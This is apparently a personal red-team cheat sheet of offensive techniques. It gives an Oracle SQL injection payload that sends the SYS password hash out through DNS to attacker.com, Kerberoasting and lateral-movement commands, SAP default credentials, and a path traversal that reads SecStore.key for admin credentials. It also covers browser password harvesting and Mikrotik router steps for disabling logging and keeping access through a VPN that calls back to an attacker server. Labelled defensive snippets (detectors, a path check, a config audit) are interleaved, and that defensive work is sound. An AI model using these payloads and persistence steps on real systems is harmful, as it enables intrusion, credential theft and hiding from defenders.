1337 Hacking Skillz
Table of contents
- Getting shells
- SSH User Enumeration
- SQL Injection
- Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net
- Windows Stuff
- SAP
- AWS
- Google/Bing dorks
- Redteam
- Mikrotik / Winbox
Getting shells
Interactive reverse shell with Python
python -c 'import pty; pty.spawn("/bin/bash")'
SSH User Enumeration
http://seclists.org/oss-sec/2018/q3/125
SQL Injection
Anything SQL Injection related should go here.
SQL Injection retrieval via DNS
This can be used against Oracle. Replace .attacker.com with a hostname you control; the query result comes back to you as a DNS lookup for a subdomain of that host.
SELECT title, publisher FROM books WHERE publisher = 'xpto'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'.attacker.com')--
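Added detection-side example (not part of the original notes): the payload above leaks data by appending it as the leftmost DNS label, so a resolver log check for long, high-entropy leftmost labels catches this class of exfiltration. The log line format and the sample lines are constructed assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample DNS query log (not real traffic). Assumed line format:
# "<timestamp> <client-ip> query: <qname>"
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 query: www.example.com
2024-01-01T10:00:01 10.0.0.5 query: 5BD4C3A1B2E4F6789A0C1D2E3F4A5B6C7D8E9F01.attacker.com
2024-01-01T10:00:02 10.0.0.7 query: mail.example.com
2024-01-01T10:00:03 10.0.0.9 query: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.com
"""

LINE_RE = re.compile(r"^\S+ (?P<src>\S+) query: (?P<qname>\S+)$")

def shannon_entropy(s: str) -> float:
    """Bits per character; close to 4.0 for a uniformly random hex string."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def is_suspicious_label(label: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """A long, high-entropy leftmost label looks like encoded data appended to a
    hostname, which is exactly what the Oracle payload above produces. The
    all-'a' label in the sample is long but low-entropy and is not flagged."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy

def find_dns_exfil(log_text: str):
    """Return (client, qname) pairs whose leftmost label looks like exfiltrated data."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".")
        if is_suspicious_label(qname.split(".")[0]):
            hits.append((m.group("src"), qname))
    return hits
```

Tune min_len and min_entropy against your own zone's legitimate names (CDN and tracking hostnames can be long) before alerting on this.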
Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net
Windows Stuff
Impacket
In order to use this, we need at least one valid domain user.
GetUserSPNs.py retrieves the service principal names from the DC and, with -request, asks for a TGS ticket for each of them:
GetUserSPNs.py -request -dc-ip [domain-controller-ip] domain/username > hashes.txt
The retrieved hashes can be cracked with hashcat using -m 13100 (Kerberos 5 TGS-REP etype 23).
After you get the passwords, take the hostnames that appear in hashes.txt and check whether you can connect to some of them with the cracked passwords. Use smbclient.py for that:
smbclient.py "domain.com/username@server"
Use the shares command to list the available shares and the use command to connect to one. Ideally we want to connect to the admin$ share, since that shows whether the user we have is an administrator on that box or not.
If you have an admin user, wmiexec.py gives you an interactive shell on the remote machine:
wmiexec.py "domain.com/username@server"
In this shell, you can list the members of the “Domain Admins” group with the following command:
net group "Domain Admins" /domain
If the user you have is there, then you are done :D
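Added detection-side example (not part of the original notes): the GetUserSPNs.py -request step above shows up on the DC as a burst of event 4769 (service ticket requested) with encryption type 0x17, the RC4 etype 23 that hashcat mode 13100 cracks. The event records below are constructed and reduced to the fields the check needs.

```python
from collections import defaultdict

# Constructed sample of Windows Security event 4769 records (not real logs),
# reduced to the fields used here: requesting account, service name,
# ticket encryption type and result status.
SAMPLE_EVENTS = [
    {"id": 4769, "account": "jdoe@CORP.LOCAL", "service": "sqlsvc", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "account": "jdoe@CORP.LOCAL", "service": "httpsvc", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "account": "jdoe@CORP.LOCAL", "service": "backupsvc", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "account": "jdoe@CORP.LOCAL", "service": "WS01$", "etype": "0x12", "status": "0x0"},
    {"id": 4769, "account": "asmith@CORP.LOCAL", "service": "krbtgt", "etype": "0x12", "status": "0x0"},
    {"id": 4768, "account": "asmith@CORP.LOCAL", "service": "krbtgt", "etype": "0x12", "status": "0x0"},
]

RC4_HMAC = "0x17"  # Kerberos etype 23, the one the -m 13100 hashes come from

def is_roastable_request(ev) -> bool:
    """True for a successful TGS request that used RC4 for a user-style
    service account (not krbtgt, not a machine account ending in '$')."""
    return (ev["id"] == 4769
            and ev["status"] == "0x0"
            and ev["etype"].lower() == RC4_HMAC
            and ev["service"].lower() != "krbtgt"
            and not ev["service"].endswith("$"))

def kerberoast_candidates(events, threshold: int = 3):
    """Return {account: sorted services} for accounts that pulled RC4 tickets
    for at least `threshold` distinct service accounts, i.e. the bulk request
    pattern GetUserSPNs.py -request produces."""
    per_account = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].add(ev["service"])
    return {acct: sorted(svcs) for acct, svcs in per_account.items()
            if len(svcs) >= threshold}
```

Bound the grouping to a short time window in a real pipeline; the sample here is small enough that no window is applied.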
Bloodhound
apt install bloodhound neo4j
This thing is loud. Use the following bash function to launch it:
# run neo4j in the background, then launch bloodhound
bhound() {
    neo4j console 1>/dev/null 2>/dev/null &
    echo "[+] running neo4j at process id: $!"
    echo ""
    echo "[+] remember to change pass at localhost:7474"
    echo "[+] if bloodhound looks goofed up, hit Ctrl+R"
    echo ""
    echo "[+] ingestors:"
    echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.exe"
    echo "[*] /usr/lib/bloodhound/resources/app/Ingestors/SharpHound.ps1"
    bloodhound
}
Finding the domain controller
Find the Domain Controllers in the network by querying the SRV record that AD publishes for them:
dig -t SRV _ldap._tcp.dc._msdcs.example.com
Replace example.com with the domain name used in the network.
Things to do in a windows box
List users in the box
net users
List processes running
tasklist.exe
List the services that are running
sc query type= service
Stop a service
sc stop ServiceNameHere
If the above does not work, try:
runas /user:Administrator sc stop ServiceNameHere
Is the service marked as non-stoppable?
Change its configuration so it won't start automatically, then kill the process associated with the service.
TODO: write down the commands here to do that.
SAP
I don’t know much about SAP. The links below have some ideas on things to do against it:
- My SAP Adventures
- http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/EN%20-%20SAP%20Penetration%20Testing%20Using%20Metasploit.pdf
Default credentials
- SAP* 06071992
- SAP* PASS
- DDIC 19920706
- DDIC Welcome01
- SAPCPIC ADMIN
- EARLYWATCH SUPPORT
- TMSADM PASSWORD
- TMSADM ADMIN
- TMSADM $1Pawd2&
- ADMIN welcome
- ADSUSER ch4ngeme
- ADS_AGENT ch4ngeme
- DEVELOPER ch4ngeme
- J2EE_ADMIN ch4ngeme
- SAPJSF ch4ngeme
- SAPR3 SAP
- CTB_ADMIN sap123
- XMI_DEMO sap123
- IDEADM admin
- SMD_ADMIN init1234
- SMD_BI_RFC init1234
- SMD_RFC init1234
- SOLMAN_ADMIN init1234
- SOLMAN_BTC init1234
- SAPSUPPORT init1234
- CONTENTSERV init1234
- SMD_AGT init1234
File paths
https://nest.parrotsec.org/security-tools/metasploit-framework/raw/36bae4066a05b66f2f572082d42e3b23f1e9c52d/data/wordlists/sap_icm_paths.txt
Arbitrary file read
http://sap_server/scheduler/ -> Check the source of the page for UIUtilJavaScriptJS. The parameter of this endpoint can be used to read arbitrary files. For example:
UIUtilJavaScriptJS?../../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.key
UIUtilJavaScriptJS?../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.properties
Decrypt the SecStore.key file to get admin creds.
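Added mitigation-side example (not part of the original notes or of any SAP code): the traversal above works because the endpoint joins a client-supplied path onto its web root without checking where the result lands. The resolver below collapses '..', absolute paths and symlinks first and then checks containment; the web root (an empty temp directory) and the request strings are constructed for the demo.

```python
import tempfile
from pathlib import Path

class TraversalError(ValueError):
    """Raised when a client-supplied path would leave the web root."""

def resolve_under(base_dir: str, requested: str) -> Path:
    """Resolve `requested` inside `base_dir` and refuse anything that escapes it.
    '..' segments, absolute paths and symlinks are all collapsed by resolve()
    before the containment check, so the check sees the real target."""
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    if candidate != base and base not in candidate.parents:
        raise TraversalError(f"refusing path outside web root: {requested!r}")
    return candidate

def classify(base_dir: str, requests):
    """Map each request to 'allowed' or 'blocked' using resolve_under()."""
    out = {}
    for r in requests:
        try:
            resolve_under(base_dir, r)
            out[r] = "allowed"
        except TraversalError:
            out[r] = "blocked"
    return out

# Constructed inputs: an assumed web root (an empty temp dir stands in for it)
# and request shapes like the SecStore.key traversal above.
DEMO_BASE = tempfile.mkdtemp()
DEMO_REQUESTS = [
    "js/UIUtil.js",                       # plain file under the root
    "js/../js/UIUtil.js",                 # '..' that stays inside the root
    "../../../../../../../../../../../sap/DM0/SYS/global/security/data/SecStore.key",
    "js/../../SecStore.properties",       # one level above the root
    "/etc/passwd",                        # absolute path replaces the root
]

def demo():
    return classify(DEMO_BASE, DEMO_REQUESTS)
```

Apply the check after the server has URL-decoded the parameter, so that encoded forms of '..' are normalised before resolve() sees them.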
AWS
Check the aws-downloader.py script.
Google/Bing dorks
- site:s3.amazonaws.com users.txt
- site:s3.amazonaws.com companyname
Redteam
OSInt / Reconnaissance
Find subdomains:
- Certificate Transparency log search. https://github.com/UnaPibaGeek/ctfr
- DNS brute-force (TKTK: URL to my brute-force list)
- ARIN Ranges - https://whois.arin.net/ui/query.do?queryinput=*example.com
- Google Dorks
Find files / sensitive data:
- AWS S3 buckets - https://buckets.grayhatwarfare.com/
- Google Dorks
Find credentials
- Data breaches
- Pastebin
Post-exploitation
Gather passwords
Firefox
Find the files key4.db and logins.json.
Click the hamburger menu and then click “Logins and Passwords”.
Edge
TODO
Internet Explorer
TODO
Chrome
Device logs: Access chrome://device-log
Stored passwords: Access chrome://settings/passwords
If the above does not work, the following might:
See stored passwords:
* Open Chrome.
* On the right side of the toolbar, click the circular Profile, then click Passwords.
* From there, you can view, delete, or export your saved passwords.
* View saved passwords: Click the eye icon to the right of each password to see it. You’ll be prompted to type your computer password in to see it in plain text.
* Delete saved passwords: Click the three vertical dots to the right of each password, then click Remove.
* Export saved passwords: To the right of “Saved Passwords,” click the three vertical dots, and click Export passwords.
Mikrotik / Winbox
There is a vulnerability in RouterOS that allows credentials to be retrieved from the router. You just need to be on the same network as the router: the exploit runs at Layer 2, so you do not need an IP address.
If you are sure that the router you are targeting is vulnerable but the exploit is not working, try changing your MAC address to a Mikrotik one (clone the router's MAC address and change the value of the last octet).
Exploits:
- https://github.com/BasuCert/WinboxPoC
- https://github.com/hackerhouse-opensource/exploits/blob/master/mikrotik-jailbreak.txt
Disable logging
First thing to do as soon as you gain access to the router is disable logging:
/system logging
print
set X disabled=yes
Replace X with the number of the logging entry in the table reported by the print command.
Adding a VPN for persistence
A convenient way to keep persistence on the router is to have it connect back to an OpenVPN server you own, and to make sure SSH is running on the Mikrotik so you can reach it over the VPN.
Run the OpenVPN server on port 443 in order to make it less suspicious.
Here is the command to create the VPN:
/interface ovpn-client
add connect-to=IP_OpenVPN_Server mac-address=FE:A8:8E:09:CA:A0 name=ovpn-out1 password=OpenVPNpassword port=443 user=OpenVPNuser
If that does not work, a firewall rule may be blocking the connection. Try the following commands to see if it opens up:
/ip firewall address-list
add address=YourIP list=default_management
add address=RoutersVPNip list=default_management
/ip firewall filter
add action=accept chain=forward comment="default configuration" src-address-list=default_management
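Added defender-side example (not part of the original notes): every step in this section leaves a trace in the router's /export output, so a periodic audit of exported configs catches it. The script below parses a constructed export excerpt (documentation-range addresses, placeholder names) and flags disabled logging entries, outbound OpenVPN clients, management addresses you did not expect, and accept rules keyed on an address list.

```python
import re

# Constructed RouterOS "/export" excerpt (not a real device); the addresses
# are documentation-range placeholders and the entries mirror the commands above.
SAMPLE_EXPORT = """\
/interface ovpn-client
add connect-to=203.0.113.10 mac-address=FE:A8:8E:09:CA:A0 name=ovpn-out1 port=443 user=OpenVPNuser
/ip firewall address-list
add address=198.51.100.7 list=default_management
/ip firewall filter
add action=accept chain=forward comment="default configuration" src-address-list=default_management
/system logging
add action=memory topics=info disabled=yes
add action=memory topics=error
"""

KV_RE = re.compile(r'([\w-]+)=("[^"]*"|\S+)')

def parse_export(text):
    """Yield (section, verb, {key: value}) for every add/set line in an export."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("/"):
            section = line
            continue
        verb, _, rest = line.partition(" ")
        yield section, verb, {k: v.strip('"') for k, v in KV_RE.findall(rest)}

def audit_routeros(text, allowed_mgmt=()):
    """Flag the changes described above: disabled logging, an outbound OpenVPN
    client, unexpected management addresses, and accept rules keyed on an
    address list. `allowed_mgmt` holds the addresses you expect to see."""
    findings = []
    for section, _verb, kv in parse_export(text):
        if section == "/system logging" and kv.get("disabled") == "yes":
            findings.append(f"logging disabled: topics={kv.get('topics')}")
        elif section == "/interface ovpn-client":
            findings.append(f"outbound VPN client {kv.get('name')} -> {kv.get('connect-to')}:{kv.get('port')}")
        elif section == "/ip firewall address-list" and kv.get("address") not in allowed_mgmt:
            findings.append(f"unexpected address in list {kv.get('list')}: {kv.get('address')}")
        elif section == "/ip firewall filter" and kv.get("action") == "accept" and kv.get("src-address-list"):
            findings.append(f"accept rule in chain {kv.get('chain')} for list {kv.get('src-address-list')}")
    return findings
```

Diffing successive exports against a known-good baseline is the cheaper routine check; this audit is for the first look at a router you have not baselined.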